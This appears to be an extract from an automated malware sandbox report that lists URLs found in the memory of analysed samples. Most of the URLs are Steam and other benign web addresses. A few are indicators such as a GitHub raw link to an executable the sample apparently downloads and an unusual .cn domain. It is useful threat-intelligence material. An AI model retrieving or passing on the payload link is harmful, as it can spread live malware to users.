76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascri
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steamp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://help.steampowered.com/en/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: powershell.exe, 00000004.00000002.2023765180.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2172468220.000000000626C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.co
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
